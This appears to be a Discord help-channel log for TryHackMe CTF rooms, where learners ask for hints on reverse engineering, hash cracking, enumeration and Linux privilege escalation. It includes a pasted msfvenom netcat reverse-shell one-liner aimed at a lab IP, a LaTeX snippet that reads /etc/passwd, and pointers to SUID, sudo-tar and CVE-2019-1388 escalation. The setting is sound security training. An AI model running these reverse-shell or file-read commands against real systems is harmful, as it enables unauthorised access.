#room-hints
it helps to organize chunks of the assembly code as "functions"
because it's true- one single function/line of code in C++ or Python could translate to anywhere between 2 to 30+ lines of instructions in Assembly
the assembly that you're looking at- it's an optimized version of instructions for the machine to perform whatever the programmer wanted to do
Alright. Thanks for taking the time to share those tips. Really appreciated. Will keep on cracking at it and apply what you suggested
yea
np- and don't be too discouraged by it, RE is hard
nobody ever said it was easy lmao
ezpz
but it's hard in the same sense as writing a paper about a poem or book
it's less about exactly what they're saying, but more about what they're trying to say
I like it even though it's giving me headaches atm. I find it quite interesting to look at. Will most likely learn more about it in the future.
^
try checking out some of the ghidra rooms, or even the basic malware analysis room
After this intro to x86-64 room, you can actually really easily do the basic malware analysis room, albeit you might have to use ghidra
I did this one right after the intro x86-64 room
Cool. Will check it out. Thanks again!
@white salmon
when I was making an RE challenge 4 lines of python code turned into 1500 lines of C code. I didn't even bother opening ghidra to check how bad it was haha
Woah.... lol
yep
but again
even after those 1500 lines of C code
they're still only just 4 lines of python code.
You don't need to figure out 1500 lines of C code- you need to figure out 4 lines of python code
lol
well yea but if you disassemble it it's gonna look like gobbledygook in assembly
even though it's only 4 lines
That's encouraging 😆
or the su binary 👀
i needed a small hint on the room Easy Peasy......anyone?
?
@tacit owl can i DM?
yaa sure
When writeups in the room itself are released
Within 3 days?
No
@twin shale thats up to the room creator
They're released whenever the creator approves them
You can submit them at any point
Oh thanks! I was curious because if I publish my writeup, the people may be able to find it, and I wouldn't like to spoil
@robust lagoon it just clicked for me
Been stuck for a few hours on the intro to x86-64 room, last task. I found s***et, there seems to be a call that does some kind of ||xor|| but I don't understand it. I set a ||break point before the cmp call when it checks if the password is correct|| but looking at the rax register after that, I can see it's 0. Not sure where to go next with this. Any suggestions are much appreciated.
@robust lagoon Got further than me, loaded it into ghidra and was lost... (I'll wait for the write-up to learn how to go about this) excellent room tho apart from my own shortcomings
https://tryhackme.com/room/basicmalwarere
@white salmon Thank you so much, I can start here!
Yeah, the Basic Malware one isn't very hard actually- you'd be surprised.
I consider all of the tasks in Basic Malware RE easier than the Intro to x86-64
Honestly it's a new kettle of fish from .net re lol, much more low level, I'll learn it at some point
Soon as I know how to use Ghidra and roughly what I ought to be doing I should be more confident. Time I guess..
Do you happen to know if any PHP rooms exist? as in editing or having to make PHP payloads to bypass
hmm
That kind of depends on what you mean by PHP payloads since PHP is used for a lot of things
sorry I mean more, like you have to make or edit a php script rather than just send up a revshell
I guess more analysis, learning based on actual PHP code
yeah
There's not a lot that I can think of, since PHP injections like that require a specific set of conditions (the target has to allow you to upload .php/.html, the target automatically has it accessible via the webserver/site as soon as you upload it)
the Blog room has one iirc
Right ok thank you. Not an issue
if you haven't done it already
dave's blog? Ok I think i only started but stopped it
ah yes done that one
yeah, most PHP injections have been kinda automated away by Metasploit
since they're very specific conditions but usually the only goal is to get a revshell
generally if you're allowed to inject php code and run it in some way, you pretty much are always allowed to go straight to revshell
Ah ok, I need to learn more of it. Yes, I need to make a rev shell that has to have upload and download ability. I will go study a source I think next, or a few.
which is the ideal result of a PHP injection
I mean, I think you might want to look into creating payloads possible, like reverse shell scripts/programs
I don't know php but have the basics of rev shells in other languages, never got on with php
oh? ok 🙂
they all pretty much work exactly the same
Awesome, that looks nothing like the sources for php i was looking at, seems more like powershell or python. sound
Yeah
you have to remember that most of PHP injections is just tricking the webserver into running system commands
What does this mean
Jeff foothold nudge? ||I have access to the wordpress site, but I can't edit the php and haven't found a php format that can be uploaded and the SQLi exploit I found i cant get to work, out of ideas||
Sure!
Thank you @white salmon Completed the RE room and actually have an idea what to do now in recovery. I can try again 🙂 appreciated.
hello,could anyone please help me with Jeff room?
hot? like Rose in Titanic?
so I have to hash it
Have you done that room yet jabba?
thanks. I will try
I was actually asking cuz I want a nudge haha
but what kind of hash? md5?
🤦♂️
Awesome Sauce
I deleted the spoiler now you're sorted
Now it just looks like I’m calling rooms hot smh
😆
james youre still here but youre not giving hintsssssssssssssssssss
@oblique cliff ?
I can't help you lol
I have the user flag but I shouldn't
Haven't deployed the machine yet
😱
Why’d I have to click the spoiler text ughhh I’m going off peace
Can someone give me a hint on the easy peasy box? I found the hidden directory but can't decode the GOST hash.
hey all, I'm having trouble with easy peasy too
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.
Nope, not for a few days
hello, i have a question in the anthem room. Task 1 question 7. I am stuck there. I just need a hint because i dont have any clue as to how i could get the name of the administrator. Thanks
thanks
The question is : Whats the name of the administrator
@cyan willow and remove this please as it’s a spoiler
Yeee
@terse kiln did you look at the hint?
yeah
its pretty clear how youre supposed to get that question 🙂
so did you try to research based off what the hint says?
no i didnt understand what the hint meant
on the website theres a quote from the administrator, did you see that?
yes
did you try researching who said that quote?
thats what the hint is trying to tell you to do
np
Help. I'm in Burp suite and I'm stuck on task 10 (#6 and #7). Can anyone help me with the whole estimated entropy thing please?
@silk prairie Just ask your question and somebody will help you :)
Hello, it is me again.
I am working on the room Jack of all trades. I have gained access into the machine and I'm looking around and I can't seem to find a way to get the Root Flag. I looked at the hint provided and not sure how it helps. Anyone else able to supply a hint? ||I have already looked at the find permissions and nothing stands out to me. Checked this for all users as well.||
You need to escalate your privileges to root. That’s what the hint is telling you
Alright thank you. I'll keep looking around the machine
Wait why did you say that about || the find command||?
Do you || have Sudo rights with it||?
It’s been awhile since I did that box
@ashen matrix
@oblique cliff ||the user has no sudo rights when i checked via sudo -l||
what I was meaning was I did a search with -perm /4000
That command looks for files with the SUID bit set
Alright. I am searching wrong. I will expand it. thank you
||jack||
And you didn’t see anything when looking at either your Sudo rights or finding SUID binaries?
You sure?
||Sudo says "Sorry, user jack may not run sudo on jack-of-all-trades. "||
Use the script suid3num.py to look for SUID binaries
It’s hard to do that manually if you don’t know what comes default on a machine
Go get that script and lmk if you see anything interesting after running that
1 thing looked odd and i ran scripts on it but its gibberish to me lol
||exim4|| That odd?
No. Go get the script from GitHub
Got it. I'll check that out and let you know
@oblique cliff ran the file and ||it is marked that strings is an exploitation, I run strings on the root flag and it's resolved|| Thank you for the help. Keeping that python for future machines
ezpz flag 2? I got all the flags including root but I am failing to find the 2nd flag lol
You've seen it before but you didn't know that you have
Hello everyone...
Anyone tried easy peasy on tryhackme?
thanks. I forgot that part completely lol 
hi y'all, I'm working on cc pentesting, currently on task 13, question 6. cracking hashes with hashcat. I got the md5 one in a few secs. yesterday I tried the md4 one with "hashcat -m 900 -a 3 <hash>" it ran for a couple hours without result and the next iteration would take 4 days... I think I'm missing something here and would appreciate a push in the right direction. 🙂
without -a 3 (so it defaults to -a 0) its giving me "read timeout in stdin mode" is that normal then?
send a screenshot
ok wait a min
np, thanks for looking into it.
save the hash in a file and try this hashcat -m 900 <file-path> <wordlist-path>
I need advice on why my exploit for Dave's blog works locally but not remotely.
Anyone open for a dm
you haven't used rockyou before ?
unzip the file first
it should be rockyou.txt and not rockyou.txt.gz
i have once, but dont recall having to unzip it :x
thx, that worked now
tries 100 things but forgets to unzip 
LOL
Any hint for easy peasy room for hidden directory...i've found 3 flags but couldn't find hidden directory.....wordlist hint would be appreciated....
@trim haven okk
Room: blog or billy's blog.
Enumerated but all i got is lousy usernames.
I dont wanna bruteforce. Compiled about 20 passwords, no dice.
Any hint or direction?
need hint for decrypt file in htdocs on room recovery
Room: Advent of Cyber
task: 18
found the hidden directory but I'm stuck after it, any hint?
hey i'm on room LaxCTF, need a hint for the foothold part. this is all i found: || a potential username john; the latex to pdf converter seems vulnerable. i tried the following code \newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file ||
but i'm not able to see anything in the output. i'm not familiar with this latex code, if someone can tell what's wrong with the code or what else i can try
@sick sun same place as the other tasks
@velvet crescent there are 3 usernames.. use wpscan to get the password.. if it is taking more than 10mins something is not right
@arctic crystal read..comments and blog post
@indigo ridge *two usernames
@indigo ridge
I got the password and username and also got the user flag
But unable to get the root flag
I checked write ups but whatever is given in writeups is not working on my machine
@white salmon yeah, that was indeed the question. I put everything... room=burp suite, task 10, question #6 and #7. The question is on "how to measure the effective estimated entropy" in sequencer. Any hints?
`Parse through the results. What is the effective estimated entropy measured in?`
You're misunderstanding what the question asks
@stuck fractal thanks. No, it was just another way of putting the question, but I have to admit it's misleading. When I put the bits I see in the results, it doesn't accept it
You've rephrased it in an incorrect way
What is the effective estimated entropy measured in?
Eg what is temperature measured in?
The question isn't how to measure it
It's what unit
Yeah thanks, that's what I meant. Now, I exactly stop around 10000 as it says, but still the number i get is not correct
I don't know what I'm doing wrong
@arctic crystal any help for this one
The VM was changed from Retro to Blaster if it's Day 13
It's a heck of a lot easier now that change has been made
And it makes the exploitation for privesc incredibly easy
ok so am I in wrong machine or I'm doing wrong things?
I don't know what you're doing so I can't answer that
I have got the user flag in day 13 of advent of cyber but I'm unable to get root priv.
That doesn't tell me anything more than you've already said
I checked writeups and whatever is given in writeups is not working in that machine
Please explain
It's the same exploit for privesc between blaster and retro, so if it's not working then you're not performing it correctly
this is what I got from writeup ||https://github.com/jas502n/CVE-2019-1388/blob/master/CVE-2019-1388.gif||
there's no chrome installed in the machine though
Doesn't matter
There doesn't need to be
Find a youtube video on it
@stuck fractal
@stuck fractal I'm doing what the question says. #1 send a request with "set-cookie" to sequencer. #2 start live capture. #3 pause around 10,000 requests. #4 analyze and try to get the effective estimated entropy... what am I doing wrong? Or should I dm you?
@silk prairie I can't help you, or I would have.
@stuck fractal can you at least tell me at what point I am getting it wrong?
@silk prairie what happened
I would have helped you if I could
@oblique cliff thanks. I'm trying to solve a question where they are asking about "effective estimated entropy" measured in. Burp room, task 10, question #6 (sequencer)
It's exactly where they say it is
He’s not wrong ^
@silk prairie As I've said, it's asking for the units
Also if you read the next task carefully, it also tells you the answer
with an s remember that
It's asking for the unit of measure like everybody mentioned
Find a youtube video on it
@stuck fractal It worked. Thanks
can someone give me nudge on the haskell root am prof already
i know ||/usr/bin/flask||
@ripe hedge in ||/usr/local/apache2/|| ??
@sinful plaza did you try running it and seeing what happens
@sick sun you fixed the rest right? The hint for the server is in the same place as the rest
@oblique cliff yes i try running the flask
And what happens
i try running it with ||python /usr/bin/flask|| nothing happened
There’s no output whatsoever?
If it's not a python file, don't run it with python
@stuck fractal kkk noted
We were gonna get there 🤨 @stuck fractal
@oblique cliff yes i get some output
Care to say what it is?
Can you screenshot instead of copy paste please?
sure
@ripe hedge can i PM you ?
how did he lie lol
@sick sun I can't guarantee an answer
Run it without
file
@oblique cliff i do run it with file
what
without @sinful plaza
@ripe hedge ok no problem bro
You can DM, but I'm at work so might not answer right away
James lied to you for our purposes
@oblique cliff I mean, I didn't know what was going on. But /usr/bin is typically binaries
Hey,
Room: zthlinux
Task: 21
Initially I searched for an environment variable called test1234 - it didn't exist - so I created it, setting it to be equal to $USER
then I tried to execute the shiba2 executable which exists in the shiba2's home directory - and it gave me seg fault
I thought maybe it contains some indicative strings in it - but didn't find something interesting
Idea?
@oblique cliff ok a min
Seg fault means you didn't create that variable
At least not properly
k sec
Oh haha you missed an important bit
If stuff doesn't work, your first step should be read back through the material
@sinful plaza ||flask [OPTIONS] COMMAND [ARGS]...
This shell command acts as general utility script for Flask applications.
It loads the application configured (through the FLASK_APP environment
variable) and then provides commands either provided by the application or
Flask itself.
The most useful commands are the "run" and "shell" command.
Example usage:
$ export FLASK_APP=hello.py
$ export FLASK_DEBUG=1
$ flask run
Options:
--version Show the flask version
--help Show this message and exit.
Commands:
run Runs a development server.
shell Runs a shell in the app context.||
yes ||shell||
sure
I'm doing Recovery. Got flag 0 and flag 1. What's the preferred approach for the remaining flags
i've never reversed an ELF file
before
🙂
@odd thistle the preferred approach is to most likely do some RE rooms first like intro to x86-64, Malware analysis, or reverse elf
@sinful plaza does your upvote mean you’ve rooted it?
will do thanks
Room HackBack 2019: [Task 12] [Forensics] [Easy] Sniff Sniff : #9: Is it required to decrypt the TLS stream?
ok then i have no idea about this task
Room: Easy peasy, Yea ik the room is new however I tried to ||decode the hash|| with several sites and tools yet it did not work. Any good website for it??
I mean for the ||hidden comment/base whatever|| in the html for the ||hidden directory ||
Not the flags
Yes, I mean that too
try using same site for all hash cracking
I'll look into that then, Cheers
@cedar tiger
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
@stuck fractal can i DM because there can be a spoiler
You cannot.
||use spoiler tags||
Try harder is the default hint
Ok so Room- easy peasy
Stuck at- Flag 2
I have the flag 1,3 but can't seem to enumerate anything more on the ports serving http..... I have used every word list and every extension
I have also tried decoding the || hidden text in highest port ||
Also i have || used the given user agent in fuzzing|| so please tell if i am doing something wrong... Or just trying at the wrong place
I was stuck on that as well, you probably have already everything to find it
Oh! Well thanks :)
It's a broken question
@stuck fractal this means?
@white salmon Not solvable through legitimate methods?
Anyone got a hint for flag15 of the Linux Challenges, I've tried everything I could find on Google
What’s the question
Can you find information about the system, such as the kernel version etc.
There's a hint on the question
Have tried uname, cat /proc/version, have looked in dmesg but can't find it
The hint tells you where to look
Please don't post spoilers like that
No
Okay
In easy peasy room, which wordlist i have to use?
I'm using ||big.txt and directory-list-2.3-medium.txt and seclists||
should be fine with those ones
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.
@white salmon that belongs to #bot-commands
Some folks are talking about easy peasy machine...that's why
I am stuck in the task "[Task 43] Bonus Challange - The True Ending" of room "zthlinux". I require access to the directory "/root" to read the file "root.txt".
I have access to 5 users (shiba1-4 and noot), neither of them has sudo permissions and can't read from "/root", as this is not a "typical box" but a linux introduction box I assumed that there is no "vulnerability" I need to exploit but probably some file that I must read. Can't seem to advance.
@white salmon there are writeups out already
so that box can be discussed
- they haven't asked anything that would spoil the box
@white salmon you need to gain access to root acount 🙂
one of the shiba users can lead you to this
oh ok, I was trying to get access to nootnoot as it had sudo permissions. thanks
yeah, you are going in the right direction
In the room easy peasy I have an md5 hash, I tried to crack it with different wordlists and websites and nothing
Any hint?
Hi, for room recovery i have done all the flags but cannot find flag2? am i missing something?
We cannot give hints as easy peasy was released yesterday
Please refer to rule 13 for more information
I believe that you can do it, keep trying!!
@atomic shuttle hey, if you look at fixutil and subsequently the other malicious file you'll see that it does few things
you probably missed one of them and didn't revert it back
Room zthlinux, Task 43, I have to reach to file named root.txt in root directory
I tried using find / -name "root.txt"
But I'm probably not at the right direction
Can someone maybe give me an hint?
@white salmon It can be cracked with a particular website
@vivid mesa I am stuck in that challenge too kek
you can't read it because the user you are logged in
doesn't have access to the root directory
@white salmon i found it, is the best for that xd
@white salmon So what are we supposed to do then?
Idk why I didn't test it before asking here
we are supposed to find a way to escalate privileges
@white salmon thats because the flag is not a common password it has probably been added to that website
I knew a few ways of escalating privileges through a shell, one of them is with faulty programs like nmap older versions and suid binaries, but I can't make either of those work in this challenge
@white salmon They say in this task that we should use our knowledge from the previous tasks only to accomplish that one, so I don't think it's the direction
well if it was only with that knowledge of previous tasks, then the solution would be to find
some file
that contains the password
but if thats the solution I have no way of knowing what file it is
So do they lie to us? 😫
who knows XD
😆
tbh at the moment my only guess is the file shiba3
its different from the others
as in the owner is not shiba or root but "460"
or maybe im totally wrong lmfao who knows
@white salmon what command you used to list those permissions?
interesting.... ... ..
Hi Guys, I am new to security field so starting from basics.
I was doing the Intro to Research question where I am unable to find out the exact answer of the below question.
If a password hash starts with $6$, what format is it (Unix variant) ?? As per me it is SHA512Crypt
@white salmon UID
yh, you mean the 460 is a UID?
I checked and it means that the user id wasn't recognized in the /etc/passwd file, most likely deleted or something
@fierce kayak try things. You know the length, and the name
How much time do I have to wait to exploit a cronjob?
Well that massively depends on how the cron job is set up
someone should do a room with a PE with a cron job which runs only once a year 😆
jajaja
cron job which runs every 12hrs or more
Thanks for the hints, i solved Easy Peasy. A good room for beginners
@white salmon Succeeded?
yes
hint?
the solution was a lot easier than all the bullshit I was trying
Haha
^
this is the tip
one of the shiba accounts has a file that we didnt check before
k, let's do some find for a "pass" file
ohh now I'm curious
Is this about the Learn Linux room?
yeah
How were we supposed to understand the following things:
- That only ****** user holds the required credentials?
- That it's located specifically in //********?
it's a mystery
@stuck fractal What do you mean by out of place files?
Normally, stuff belonging to a user will be in places like their home directory
Stuff that's in weird places draws attention
In the Subscriber Room for Burpsuite on Task 6 #4 dont know how to get to the "Web Application hosted on the VM''
Go to the IP of the deployed machine in your browser
Room: Network Services Task:7 ( Exploiting Telnet) Task 7 #11 What is the contents of flag.txt? So here is where I am. I have ran the msfvenom and got
root@kali:~# msfvenom -p cmd/unix/reverse_netcat lhost=10.10.203.56 lport=4444 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 98 bytes
mkfifo /tmp/lrxfkc; nc 10.10.203.56 4444 0</tmp/lrxfkc | /bin/sh >/tmp/lrxfkc 2>&1; rm /tmp/lrxfkc
the IP is that of the deployed machine so then I go to telnet and run mkfifo /tmp/lrxfkc; nc 10.10.203.56 4444 0</tmp/lrxfkc | /bin/sh >/tmp/lrxfkc 2>&1; rm /tmp/lrxfkc correct?
Nearly
There's something you need to do to get the telnet backdoor to run that command, but yes
are you just refering to getting into telnet?
.RUN correct?
I an running this on the deployed machine.
I have the netcat running on my local machine
Do you understand what the LHOST means?
if 10.10.203.56 is the IP address of the Network services room, then your command is wrong
LHOST is the local host
LHOST here is the machine the shell is going to try to reach back to
It's the same for metasploit
The IP address needs to be your attacking machine's IP
right so then I should make the IP after the nc my local machine which I have a screen listening on port 4444
.RUN mkfifo /tmp/lrxfkc; nc 10.10.244.102 4444 0</tmp/lrxfkc | /bin/sh >/tmp/lrxfkc 2>&1; rm /tmp/lrxfk
"I should make the IP after the nc my local machine which I have a screen listening on port 4444" I don't know what you mean
The IP address needs to be the IP of your attacking machine
the tun0 (VPN) address* (if using a VM)
that IP 10.10.244.102 is the machine I am running the attack from
As I've asked, are you attacking from a tryhackme kali instance?
yes
Need Help In The Root For the Room Bounty Hacker
sorry
?Invalid command
You're not connected to the telnet session
Need Help In The Root For the Room Bounty Hacker
@mystic walrus
Explain your problem
Yeah, but you're not in a telnet shell on the machine. Please provide some screenshots as it's much more helpful for us. @blazing ruin
@arctic crystal I Have Done Sudo -l
Then I Get (root) /bin/tar
Then I Don’t Get Any Exploit For That..Can You Lead Me To The Correct Path
https://gtfobins.github.io/ @mystic walrus
Burpsuite Room https://tryhackme.com/room/rpburpsuite
[Task 7] Target Definition
Question 6
What is the term for browsing the application as a normal user prior to examining it further?
I can't seem to find the answer to this even with the hint, anyone got a clue for the answer?
@stuck fractal Thanks Man!❤️
@soft badger It's in the text I believe
read the paragraph closer
Yeah, re-read the task text
Yes I looked through the intro where it said to look but nothing seemed to help, I'll re-read
Not sure what you mean, sorry
So, a task is broken down into 3 main parts
The title, in the bar
The task text, between that title bar and the questions
And then the questions
You want that middle bit, between the title and the start of the questions
The task text
Hey man , help with Recovery Yet ?
i see
Just flags 2 and 5
Room: linuxctf, flag4, I think I found the required files but i'm not permitted to open them, nor change their permissions
hints?
You're looking in the wrong place then @vivid mesa
@stuck fractal help ?
:(
I, like everyone else here, am a volunteer
I have not completed the room, I can't help you even if I wanted to.
Have you considered... being patient?
or potentially accepting the fact that not too many people have solved it, so you're unlikely to get a hint?
suppose I'm in directory x, i want to search for a word y in all the files which are contained in this directory, and in sub-directories inside this directory
is there a way to do that?
the find command
There's a whole room dedicated to it
I really recommend learning how to use it
google where cron jobs are created
@oblique cliff /var/spool/cron
no permission to read the files there
oh you must be kidding
you got it?
yeah. thank you!
🔥
grep -rnw '.' -e 'c9*'
why this command doesn't help me with finding flag 6?
the current directory is home
flag 6
Anyone else who has attempted "Bounty hacker " can give a hint as to pw file to use?
@dull palm Enumerate harder
There's a few ports open, keep looking and you'll find it
@vivid mesa You're told the name of the file, it's grep through a file not for a file
Yes sir, I need to buy you a coffee or a shot 😉
why not both
@stuck fractal But this command ( grep -rnw '.' -e 'c9*') is supposed to search in all the files the strings starting with c9
I just told you what you were doing wrong
You are told what file to use!
Don't overcomplicate things
k
room/smaggroto
Found some credentials on an subdirectory, any hint for the further step?
Aight!
Would buy James both, and something to eat, invite him to HLSR if he wanted to come. This person goes above and beyond . And I appreciate the help.
it's just a question though: I was surfing THM and saw the room Brooklyn 99. Of most of those who solved it, only one had 110 points while the others had 60, even though every one of them had given both answers. Why so? Just a doubt, answer if possible!
The first person to answer the question gets bonus points
That's known as first blood, or blood points
@dull palm Houston?
oh i get it thx!
OMW, US isn't letting brits in yet but we'll see
Thank you.
flag 10 in room linuxctf
Find all other users on the system. What is flag 10.
It's not well-defined
what are exactly the other users?
10, 11, 12, and son on?...
because 21 and 13 for example
You cannot expect to be walked through a challenge
You are also just stating numbers
The users on that box are not numbers
They are names.
Room timed out with An hour remaining. Tried to add time at 55mins didn't allow.
Which room @dull palm
it probably didn't actually time out the room
Did but it was dead. Hydra and gobust was telling me cant find host. @oblique cliff "bounty hacker"
Is that windows or Linux
Linux
The flags are usually checkpoints though, so in general you don't have to restart absolutely everything
I just reset the room
Weird. Post it in #site-bugs. Say the room name and tag bloke
Will do, thank you.
There are files that are out of place
Normally, a user's files go in their home directory
So maybe if you look through files belonging to each user, you'll find something that's out of place
I mean I gave you a little more direction
I recommend using find
And suppressing error messages
Guessing that I should work harder at my enumeration. Thank you James for the help.
Yes null if you are trying to find user shiba4 and are killing any errors.
Welcome 💯
which ftp server am I supposed to connect to in linuxctf task 5 exc 4 ?
localhost doesn't seem to work
It should have an FTP server running
localhost from your attacking machine refers to your attacking machine
well yah, I am ssh'ed into the "alice" account of the machine
and from there trying to ftp into localhost
nevermind used another ftp client and it worked
I've run into an interesting problem doing the "Common Linux Privesc" Task 4 creating a payload. When I try to do the payload on my kali virtual box I keep getting Inverse host lookup, but when I do the payload on the tryhackme in-browser machine it works?
Also the autoscript.sh doesn't seem to run on its own like its supposed to every 5 min. I have to manually run it
@tiny badge In my case... I used my local kali.. And netcat automatically started the reverse shell after 3 mins..
yeah, that's why I don't understand what is going on. I keep getting this inverse host lookup failed: Unknown host
but like i said earlier for some reason it works on the tryhackme in browser machine. I get connected
2019.4
I m not at all sure if it will work or not.. try to do a full upgrade .. see if it helps..
Room: Network Services
task 4 Q 4... whats the username and where to find it?
Need help!
Guys can anybody give me some nudge/hints for inoculation, or how to exploit/enumerate webhooks
Thanks for the help
Can you find information about the system, such as the kernel version etc. Find flag 15.
I've run the command uname -a
getting all the information about the linux version etc..
but can't see how to continue from here...
bob@ip-10-10-36-34:/$ uname -a Linux ip-10-10-36-34 4.4.0-1075-aws #85-Ubuntu SMP Thu Jan 17 17:15:12 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
their hint is *release - our release here is 4 to my understanding
doesn't help...
nvm
@red mesa did you enumerate?
@vivid mesa think about what *release means in a Linux context
release version
oh regexes, thanks
someone can help with flags 26, 27?
i tried to find a file containing the starting word in flag26:
grep -rnw '.' -e '4bceb' 2>/dev/null
but it doesn't help
Both of those you should use the find command
And 26 pipe it into the grep command
k
flag 27 - some hint?
I've managed to find the file
but only the root has the permissions to read and execute it
I'm logged into alice, when running the command sudo -l:
```
sudo -l
Matching Defaults entries for alice on ip-10-10-36-34.eu-west-1.compute.internal:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User alice may run the following commands on ip-10-10-36-34.eu-west-1.compute.internal:
(ALL) NOPASSWD: /bin/cat /home/flag27
```
Doesn't say much
I inspect also the file in /bin/cat - nothing...
Actually that command tells you exactly everything you need to know
Notice what the results of sudo -l tells you and see if you can figure out what it means
The file tells you what you're allowed to do
In the Python playground room can anyone give me a hint for the privesc?
@golden sedge go back a bit ;)
What do you mean?
well, you should have one root by now
I have found flag1 and flag2
maybe it's worth investigating that one a bit further
how do u know multiple websites are running on same ip?????
Maybe they are running on different ports
you don't have to post in multiple channels and spam the same question every 2 mins
On the hydra intro/rp room,
The username I use for both questions is just molly right?
Yeah It's molly
thanks for the confirmation
hey, I'm a beginner and I'm in this room: https://tryhackme.com/room/zthlinux task 43, and I'm just stuck, like I just don't have the perms so I can't do chmod or chown and I don't know how I'm supposed to give myself sudo perms
sry for this english btw 🙂
which user have you logged in as? @alpine lantern
shiba4
i have shiba1,shiba2,shiba3 & 4
but i need root permissions for root.txt
My advice would be look closely on how to use the find command
the different flags for this command
ok ok i'll try thx 🙂
honestly this task is way advanced if you started THM with this room
It should help you
ok thx 🙂
Tag me if you need a bit more hints, this one is not obvious x)
it's just saying that with what I learn in this room, I can find the flag
ok ok 🙂
thx
Notice what the results of sudo -l tells you and see if you can figure out what it means
@white salmon Can't see anything indicative actually
Do you know how sudo works, and how all commands/programs in linux works in general?
Notice how there's more than just /bin/cat in sudo -l
What do you think /bin/cat is- and what the 'NOPASSWD' means
Room: The Cod Caper
Task: 5 Q3
I'm not able to find ssh password any hint for it?
I have got the ssh key but it is not working
@arctic crystal The key is a rabbit hole
I'm trying to search for password
any hint where I can get that except shadow file ofcourse
There are no passwords stored in the shadow file
hashed format
They're password hashes. It doesn't store passwords.
yes
@alpine lantern you have everything you need to do it, just take the flags they give you and write a meaningful command ^^
Don't hesitate to really look at the answer format, that's a big hint in itself
yeah yeah ik 🙂

And read the manual
hm, what is wildcards ?
linux what are wildcards into google
some help for number #6 task 3 ? https://tryhackme.com/room/thefindcommand
what do you got for this one ?
We are not gonna tell you what to write, but we can guide you if you already have an idea of what you should have
@alpine lantern
i just don't know what i need to put on "-perm"
like g=w ?
something like that ?
others ?
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
Metasploit
Task 4 Question 5
I need a boost on this, I've tried googling it but I can't seem to find anything.
I tried using info but nothing works
@prisma viper Please be patient
Don't take it to multiple chats if you've just asked, it's spammy
Look at the image
Answer is given in that diagram itself
thanks 😅
@proven bridge any nudge for CCT, I'm stuck in the 2nd part of the 1st challenge (pcap file), I extracted the ||conversation||, I got the ||key||, but I'm stuck in extracting the exact things that I need to ||decrypt||
@midnight monolith if you look at the ||encrypted conversation|| you can extract it and then ||re-play it through the same program with the same key||
i see, thanks @wooden mist
@stuck fractal you lie. The only inkling i have is the ||gnupg|| stuff, but i dont think I'm right
@oblique cliff ??
you said id be able to do wonderland already 😭
With enough research
you lie. The only inkling i have is the ||gnupg|| stuff, but i dont think I'm right
for the first privesc or horizontal pivot^
You're not right
okie dokie
wowie, i was expecting something crazy so i didnt even check my|| sudo|| rights 😅
@oblique cliff gnupg is the GNU privacy guard.
Flag 2 on Recovery has eluded me since the room dropped, all other flags were quick but I'm missing something obviously too simple 😆
@fast swan confirm, it's something stupid
Go through what the malware does
And figure out what you didn't do
only interesting things I could find are ||sudo python command, but i cant edit that; and perl capabilities and I cant run that either||
gotta run, ill annoy ya more later
I had missed it the first time because I foobarred the box...
Muir, when testing it, somehow managed to break the permissions for the whole box
When he deployed it, files had the wrong permissions
Recovery?
O I thought we were still talking about wonderland
Oh Wonderland, that's still impressive
wait what, so am i supposed to be able to run or change those?
@oblique cliff Nope
ok then yea i wave the white flag for the day
You're on the hatter?
Oh
im alicia keys
It's accessible
It's more simple than you think
And bloody cute

well i turned off my machine so ill think about it later
but good to know
i need some more head banging anyway
The exploit is a bit tricky
since it wasnt in her home directory i just assumed user was one of the other 2 on the box
But shouldn't be too hard with some research
It's not tricky, you can find it on google
ez to say when you made the box 🙃
Bit tricky if you've never seen it
@oblique cliff just practice practice , its all about practice
idk if thats a hint or a troll but ok...
my teacher used to tell me practice practice
Anyways, think a bit about Wonderland and you'll figure out the first flag
Considering you know where one other flag is
And I'll shut up before James kills me ;)
appreciate it
But I'd assume a native English speaker would more easily understand that one
jus cuz i speek engrish doesn mean i gud at it
I mean you speak every other language too, you can do it
I only speak google translate
hello, I am in the linux walkthrough and I have to get password for shiba2, I have the noot.txt made, but where is the binary file located?
There's a command that's useful for finding things I believe
You should have learned a bit about it
Read the source material and understand it
Not the command I had in mind but it's been a while since I did that room. Grats
Ok this one is driving me nuts. I'm in "Linux Challenges" and i'm supposed to find flag4 where cron jobs are created. I tried crontab -e which gives me a blank/black page with nothing on it. If I cat or nano /etc/crontab it doesn't give me flag 4 either. What am i missing here? 🙂
@left sparrow ... Cron jobs run as specific entities. make sure you are polling the right one
it's like handing a bunch of tasks to everyone in the room, except your lazy brother, then going to your lazy brother and saying "What do I gotta get done today?"
hello, I am in the linux walkthrough and I have to get password for shiba2, I have the noot.txt made, but where is the binary file located?
@glad hull The task title does tell you
yes I know I just forgot... I know it now
Decided to leave Recovery for now but wrote a script that does the room for me apart from flag 2 for next time I try the box to speed things up 😂
now the question is "How do you specify which shell is used when you login?" because I thought it's "su" or "su root" but idk what else...
and there was not a word about shell in there
